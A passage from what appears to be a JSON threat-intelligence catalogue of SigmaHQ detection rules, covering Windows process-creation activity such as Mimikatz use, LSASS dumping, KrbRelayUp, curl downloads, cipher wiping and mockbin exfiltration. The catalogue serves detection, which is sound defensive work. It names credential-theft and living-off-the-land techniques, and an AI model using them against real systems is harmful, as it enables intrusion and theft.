Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "creation_date": "2019-10-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_mimikatz_command_line.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://tools.thehacker.recipes/mimikatz/modules", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "value": "HackTool - Mimikatz Execution" }, { "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" ], "filename": "proc_creation_win_dotnetdump_memory_dump.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1635288066909966338", "https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnetdump_memory_dump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", "value": "Process Memory Dump Via Dotnet-Dump" }, { "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_type_arbitrary_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mr0range.com/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_type_arbitrary_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "value": "Potential Download/Upload Activity Using Type Command" }, { "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-26", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_krbrelayup.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Dec0ne/KrbRelayUp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelayup.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003", "attack.lateral-movement", "attack.t1550.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", "value": "HackTool - KrbRelayUp Execution" }, { "description": "Detects the stopping of a Windows service via the \"sc.exe\" utility", "meta": { "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-05", "falsepositive": [ "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly" ], "filename": "proc_creation_win_sc_stop_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_stop_service.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", "value": "Stop Windows Service Via Sc.EXE" }, { "description": "Detects the execution of the \"msxsl\" binary with an \"http\" keyword in the command line. This might indicate a potential remote execution of XSL files.", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-11-09", "falsepositive": [ "Msxsl is not installed by default and is deprecated, so unlikely on most systems." ], "filename": "proc_creation_win_msxsl_remote_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1220" ] }, "related": [ { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75d0a94e-6252-448d-a7be-d953dff527bb", "value": "Remote XSL Execution Via Msxsl.EXE" }, { "description": "Detects execution of \"WerFault.exe\" with the \"-pr\" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_werfault_reflect_debugger_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html", "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd", "value": "Potential ReflectDebugger Content Execution Via WerFault.EXE" }, { "description": "Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-08-01", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "value": "Potential Mpclient.DLL Sideloading Via Defender Binaries" }, { "description": "Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-05", "falsepositive": [ "Legitimate usage for debugging purposes" ], "filename": "proc_creation_win_susp_electron_execution_proxy.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/", "https://positive.security/blog/ms-officecmd-rce", "https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc", "https://lolbas-project.github.io/lolbas/Binaries/Msedge/", "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf", "https://lolbas-project.github.io/lolbas/Binaries/Teams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml" ], "tags": [ "attack.execution" ] }, "uuid": "378a05d8-963c-46c9-bcce-13c7657eac99", "value": "Potentially Suspicious Electron Application CommandLine" }, { "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", "meta": { "author": "Janantha Marasinghe", "creation_date": "2020-09-26", "falsepositive": [ "This may have false positives on hosts where Virtualbox is legitimately being used for operations" ], "filename": "proc_creation_win_virtualbox_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.006", "attack.t1564" ] }, "related": [ { "dest-uuid": "b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bab049ca-7471-4828-9024-38279a4c04da", "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" }, { "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_gather_network_info_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gather_network_info_execution.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1615", "attack.t1059.005" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07aa184a-870d-413d-893a-157f317f6f58", "value": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS" }, { "description": "Detects the use of CoercedPotato, a tool for privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-10-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_coercedpotato.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.hackvens.fr/articles/CoercedPotato.html", "https://github.com/hackvens/CoercedPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_coercedpotato.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e8d34729-86a4-4140-adfd-0a29c2106307", "value": "HackTool - CoercedPotato Execution" }, { "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", "meta": { "author": "Sreeman", "creation_date": "2020-10-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml" ], "tags": [ "attack.credential-access", "attack.t1556.002" ] }, "related": [ { "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", "value": "Dropping Of Password Filter DLL" }, { "description": "Detects usage of Dsacls to grant over permissive permissions", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Legitimate administrators granting over permissive permissions to users" ], "filename": "proc_creation_win_dsacls_abuse_permissions.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/dsacls.html", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", "value": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE" }, { "description": "Detects the use of \"Ilasm.EXE\" in order to compile C# intermediate (IL) code to EXE or DLL.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ilasm_il_code_compilation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.echotrail.io/insights/search/ilasm.exe", "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ilasm_il_code_compilation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "value": "C# IL Code Compilation Via Ilasm.EXE" }, { "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_groups_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_groups_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "value": "Group Membership Reconnaissance Via Whoami.EXE" }, { "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", "meta": { "author": "frack113", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b046706-5789-4673-b111-66f25fe99534", "value": "Deleted Data Overwritten Via Cipher.EXE" }, { "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_susp_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file", "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", "https://twitter.com/max_mal_/status/1542461200797163522", "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "value": "Suspicious Curl.EXE Download" }, { "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", "meta": { "author": "Agro (@agro_sev) oscd.community", "creation_date": "2020-10-10", "falsepositive": [ "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." ], "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", "https://twitter.com/bryon_/status/975835709587075072", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", "value": "Detection of PowerShell Execution via Sqlps.exe" }, { "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", "meta": { "author": "Trent Liffick", "creation_date": "2020-05-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_lnk.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lnk.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1202", "attack.t1027.003" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c2e147a9-d1a8-4074-811a-d8789202d916", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", "value": "Findstr Launching .lnk File" }, { "description": "Detects the execution of a renamed BOINC binary.", "meta": { "author": "Matt Anderson (Huntress)", "creation_date": "2024-07-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_boinc.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details", "https://boinc.berkeley.edu/", "https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_boinc.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553" ] }, "related": [ { "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30d07da2-83ab-45d8-ae75-ec7c0edcaffc", "value": "Renamed BOINC Client Execution" }, { "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", "meta": { "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-03-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_appdata_local_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "value": "Suspicious Schtasks Execution AppData Folder" }, { "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate usage by some scripts might trigger this as well" ], "filename": "proc_creation_win_driverquery_recon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/", "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "value": "Potential Recon Activity Using DriverQuery.EXE" }, { "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", "meta": { "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Backup scenarios using the commandline" ], "filename": "proc_creation_win_cmd_shadowcopy_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "value": "Copy From VolumeShadowCopy Via Cmd.EXE" }, { "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", "meta": { "author": "Markus Neis, Sander Wiebing", "creation_date": "2018-11-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_file_characteristics.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", "https://securelist.com/muddywater/88059/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" ], "tags": [ "attack.execution", "attack.t1059.006" ] }, "related": [ { "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "value": "Suspicious File Characteristics Due to Missing Fields" }, { "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", "meta": { "author": "frack113", "creation_date": "2022-01-15", "falsepositive": [ "False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" ], "filename": "proc_creation_win_cmd_del_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "value": "File Deletion Via Del" }, { "description": "Detects the execution of a Chromium based browser process with the \"headless\" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-09-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_mockbin_abuse.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/steal-it-campaign", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml" ], "tags": [ "attack.execution" ] }, "uuid": "1c526788-0abe-4713-862f-b520da5e5316", "value": "Chromium Browser Headless Execution To Mockbin Like Site" }, { "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_ftp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c", "value": "Renamed FTP.EXE Execution" }, { "description": "Detects the execution of 